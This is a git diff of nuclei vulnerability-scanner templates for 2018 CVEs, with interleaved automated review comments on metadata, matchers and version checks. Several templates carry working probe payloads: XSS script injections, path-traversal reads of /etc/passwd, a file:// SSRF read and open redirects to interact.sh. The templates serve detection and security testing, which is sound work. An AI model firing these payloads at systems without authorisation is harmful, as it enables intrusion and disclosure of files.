Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/cve-2018-11409.yaml b/nuclei-templates/CVE-2018/CVE-2018-11409.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11409.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11409.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11473.yaml b/nuclei-templates/CVE-2018/CVE-2018-11473.yaml index 9419700bfe..b812c09865 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11473.yaml 
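Review bot: The second hunk appends a `# Enhanced by mp on 2022/06/19` trailer while every other template in this commit removes such trailers in favor of a `# digest:` line, so it looks like it was restored by mistake. The shortened `name: Opencart Divido - Sql Injection` loses that Divido is a plugin, which the description still says; `name: OpenCart Divido Plugin - SQL Injection` would also match the casing used in CVE-2017-8917. Moving the md5 seed into `variables: num` and matching on `{{md5({{num}})}}` is a clear improvement over the hard-coded hash.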
+++ b/nuclei-templates/CVE-2018/CVE-2018-11473.yaml @@ -6,26 +6,36 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/monstra-cms/monstra/issues/446 - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page - https://nvd.nist.gov/vuln/detail/CVE-2018-11473 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.39534 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: monstra + product: monstra shodan-query: http.favicon.hash:419828698 - verified: "true" - tags: cve,cve2018,xss,mostra,mostracms,cms + tags: cve,cve2018,xss,mostra,mostracms,cms,monstra -requests: +http: - raw: - | GET /users/registration HTTP/1.1 Host: {{Hostname}} - - | POST /users/registration HTTP/1.1 Host: {{Hostname}} @@ -33,7 +43,6 @@ requests: csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register - cookie-reuse: true matchers-condition: and matchers: - type: word 
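Review bot: The second hunk removes `cookie-reuse: true` from a two-request raw flow whose POST depends on the `csrf` value extracted from the GET; if the nuclei version this repository targets does not reuse cookies by default, the token will belong to a different session and the check may never match. If the key was dropped because newer engines reuse cookies implicitly, a comment saying so (`# cookie reuse is implicit in recent nuclei releases`) would stop the next reader from re-adding it. `max-request: 2` correctly reflects the two raw requests.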
@@ -41,8 +50,8 @@ requests: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -56,10 +65,9 @@ requests: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true - -# Enhanced by md on 2023/01/30 + part: body +# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml b/nuclei-templates/CVE-2018/CVE-2018-11709.yaml deleted file mode 100644 index 1b02923a23..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-11709 - -info: - name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - - https://wordpress.org/plugins/wpforo/#developers - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-11709 - cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11776.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11776.yaml 
diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1207.yaml b/nuclei-templates/CVE-2018/CVE-2018-1207.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1207.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1207.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml new file mode 100644 index 0000000000..94384ca163 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2018-12300 + +info: + name: Seagate NAS OS 4.3.15.1 - Open Redirect + author: 0x_Akoko + severity: medium + description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + impact: | + Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. + remediation: | + Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12300 + cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.45685 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: seagate + product: nas_os + tags: cve2018,cve,redirect,seagate,nasos + +http: + - method: GET + path: + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
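Review bot: The `state` value in the request path ends in a bare `#` (`state=http://www.interact.sh#`); an HTTP client normally treats `#` as the start of a URL fragment and does not send it, so if the trailing character is part of the intended value it should be percent-encoded as `%23`, and if it is not, it should be removed so the template is unambiguous. A short comment above the path saying what `code=test` is for would help, since the description only mentions the `state` parameter.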
diff --git a/nuclei-templates/CVE-2018/cve-2018-12634.yaml b/nuclei-templates/CVE-2018/CVE-2018-12634.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12634.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12634.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12675.yaml b/nuclei-templates/CVE-2018/CVE-2018-12675.yaml new file mode 100644 index 0000000000..52e4353249 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12675.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2018-12675 + +info: + name: SV3C HD Camera L Series - Open Redirect + author: 0x_Akoko + severity: medium + description: | + SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. + reference: + - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory + - https://vuldb.com/?id.125799 + - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12675 + cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.44971 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sv3c + product: h.264_poe_ip_camera_firmware + tags: cve,cve2018,redirect,sv3c,camera,iot + +http: + - method: GET + path: + - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' + + matchers: + - type: word + part: body + words: + - '' +# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
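Review bot: The single matcher in the new template is `type: word` with `words: - ''`, an empty string, which as written would match every response body and report every host as vulnerable. If the value was stripped by whatever rendered this page (the same artifact appears as `- ''` in CVE-2018-14013 and `- ""` in the deleted CVE-2018-11709), confirm that the committed file carries the real expected marker; otherwise the matcher needs the actual string it is meant to look for. A `matchers-condition: and` with a status matcher, as the other new templates in this commit have, would also cut false positives.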
diff --git a/nuclei-templates/CVE-2018/CVE-2018-12909.yaml b/nuclei-templates/CVE-2018/CVE-2018-12909.yaml new file mode 100644 index 0000000000..9092672f1f --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12909.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2018-12909 + +info: + name: Webgrind <= 1.5 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI + remediation: | + Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md + - https://github.com/jokkedk/webgrind/issues/112 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12909 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Miraitowa70/POC-Notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-12909 + cwe-id: CWE-22 + epss-score: 0.00466 + epss-percentile: 0.74979 + cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: webgrind_project + product: webgrind + fofa-query: app="Webgrind" + tags: cve,cve2018,lfi,webgrind,webgrind_project + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - 'webgrind' + condition: and + + - type: status + status: + - 200 +# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml deleted file mode 100644 index 40cfb44af3..0000000000 
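Review bot: The new template has a `remediation` block but no `impact`, unlike the other templates this commit adds (CVE-2018-1000671, CVE-2018-12300, CVE-2018-12675); add one line such as `impact: An attacker can read any file the web server user can access.`, or drop the field everywhere for consistency. `name` says `<= 1.5` while the `cpe` pins `1.5.0` only; if earlier releases are affected, use `*` in the version field as the Sympa and Monstra templates in this commit do. The `description` sentence also lacks a terminating period.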
--- a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-13980 - -info: - name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion - author: wisnupramoedya - severity: medium - description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. - reference: - - https://www.exploit-db.com/exploits/45016 - - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2018-13980 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14013.yaml b/nuclei-templates/CVE-2018/CVE-2018-14013.yaml index cb17962655..cee7520213 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-14013.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-14013.yaml 
@@ -1,33 +1,34 @@ id: CVE-2018-14013 + info: name: Zimbra XSS author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-14013 - - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - - https://bugzilla.zimbra.com/show_bug.cgi?id=109018 - - https://bugzilla.zimbra.com/show_bug.cgi?id=109017 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + tags: cve,cve2018,xss,zimbra classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-14013 cwe-id: CWE-79 - tags: cve,cve2018,xss,zimbra + requests: - method: GET path: - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word words: - '' part: body + - type: status status: - 200 + - type: word part: header words: diff --git a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml b/nuclei-templates/CVE-2018/CVE-2018-14064.yaml deleted file mode 100644 index 5e29e1cb36..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2018-14064 -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: critical - description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. - reference: - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-14064 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,camera,iot -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14502.yaml b/nuclei-templates/CVE-2018/CVE-2018-14502.yaml index 76679bb452..f77f833be9 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-14502.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-14502.yaml 
@@ -1,31 +1,46 @@ id: CVE-2018-14502 info: - name: Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection - author: akincibor + name: > + Chained Quiz <= 1.0.8.2 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. + description: > + controllers/quizzes.php in the Kiboko Chained Quiz plugin before 1.0.9 for WordPress allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. reference: - - https://wpscan.com/vulnerability/9112 - tags: cve,cve2018,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6ef0c41-e498-4de6-a86a-d23f65a7a824?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-14502 + metadata: + fofa-query: "wp-content/plugins/chained-quiz/" + google-query: inurl:"/wp-content/plugins/chained-quiz/" + shodan-query: 'vuln:CVE-2018-14502' + tags: cve,wordpress,wp-plugin,chained-quiz,critical -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt' + - "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "Chained Quiz" + - "chained-quiz" part: body - type: dsl dsl: - - compare_versions(version, '< 1.0.9') \ No newline at end of file + - compare_versions(version, '<= 1.0.9') \ No newline at end of file 
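Review bot: The version gate in the dsl matcher is loosened from `compare_versions(version, '< 1.0.9')` to `'<= 1.0.9'`, but the new description says the plugin is vulnerable "before 1.0.9" and the new name says `<= 1.0.8.2`, so the fixed release 1.0.9 would now be reported as vulnerable; keep `- compare_versions(version, '< 1.0.9')`. The body word changed from `Chained Quiz` to `chained-quiz`; whether readme.txt contains the slug rather than the display name is not visible here, so confirm against a real readme before merging. The two extractors share `name: version` and only the first is `internal: true`; the second appears to exist so the version is surfaced in output, which is fine but deserves a one-line comment saying so.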
diff --git a/nuclei-templates/CVE-2018/CVE-2018-14574.yaml b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml new file mode 100644 index 0000000000..18f87e359a --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-14574 + +info: + name: Django Open Redirect + author: pikpikcu + severity: medium + tags: cve,cve2018,django,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + reference: + - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + - https://usn.ubuntu.com/3726-1/ + - http://www.securitytracker.com/id/1041403 + - https://www.debian.org/security/2018/dsa-4264 + - http://www.securityfocus.com/bid/104970 + - https://access.redhat.com/errata/RHSA-2019:0265 + +requests: + - method: GET + path: + - "{{BaseURL}}//www.example.com" + + matchers-condition: and + matchers: + - type: status + status: + - 301 + - type: word + words: + - "Location: https://www.example.com" + - "Location: http://www.example.com" + part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-14918.yaml b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml new file mode 100644 index 0000000000..882b57bf37 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2018-14918 + +info: + name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. + reference: + - https://seclists.org/fulldisclosure/2019/Apr/12 + - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-14918 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/HimmelAward/Goby_POC + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-14918 + cwe-id: CWE-22 + epss-score: 0.44897 + epss-percentile: 0.97077 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: loytec + product: lgate-902_firmware + shodan-query: http.html:"LGATE-902" + tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss + +http: + - method: GET + path: + - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 
490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml b/nuclei-templates/CVE-2018/CVE-2018-15138.yaml deleted file mode 100644 index 7de14fe8b9..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-15138 - -info: - name: LG-Ericsson iPECS NMS 30M - Local File Inclusion - author: 0x_Akoko - severity: high - description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. - reference: - - https://cxsecurity.com/issue/WLB-2018080070 - - https://www.exploit-db.com/exploits/45167/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-15138 - cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" - - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml index 0fa74f21ac..2392e8714b 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml 
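Review bot: The `tags:` line includes `xss`, but the template only checks for `/etc/passwd` content (`cwe-id: CWE-22`, regex `root:.*:0:0:`); drop `xss`, otherwise the template is selected in XSS-only runs where it cannot match. The description reads "This can be used to read and configuration files containing, e.g., usernames and passwords." — suggest `This can be used to read configuration files containing, e.g., usernames and passwords.` The trailing `# digest:` line is presumably a template signature; if it is not regenerated automatically, any metadata fix here will need re-signing.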
@@ -1,28 +1,28 @@ id: CVE-2018-15473 - info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-15473 cwe-id: CWE-362 tags: network,openssh,cve,cve2018 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' - extractors: - type: regex regex: diff --git a/nuclei-templates/CVE-2018/cve-2018-15517.yaml b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15517.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15517.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15640.yaml b/nuclei-templates/CVE-2018/CVE-2018-15640.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15640.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15640.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml index 7840581824..9e75ab5103 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml 
@@ -13,12 +13,10 @@ info: cve-id: CVE-2018-15657 cwe-id: CWE-918 tags: cve,cve2018,suremdm,lfi - requests: - method: GET path: - "{{BaseURL}}/api/DownloadUrlResponse.ashx?url=file://C:/windows/win.ini" - stop-at-first-match: true matchers: - type: word diff --git a/nuclei-templates/CVE-2018/cve-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15745.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15745.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15917.yaml b/nuclei-templates/CVE-2018/CVE-2018-15917.yaml index bc9ce06c38..507df95ba1 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15917.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15917.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/45338 - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 - https://github.com/bbalet/jorani/issues/254 + - https://github.com/JavierOlmedo/JavierOlmedo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 - epss-score: 0.05086 - epss-percentile: 0.92074 + epss-score: 0.04217 + epss-percentile: 0.92046 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +27,7 @@ info: vendor: jorani_project product: jorani shodan-query: title:"Login - Jorani" - tags: cve,cve2018,jorani,xss + tags: cve,cve2018,jorani,xss,jorani_project http: - raw: @@ -54,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df2f1a0e4cbeb355a64a504f07c667baada95184d9da1eb29b2e42c960b670bc022071ef50eb71711b6f7e711af0d7e31f6f85a3927461da4c61b02cc22cb3084ca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
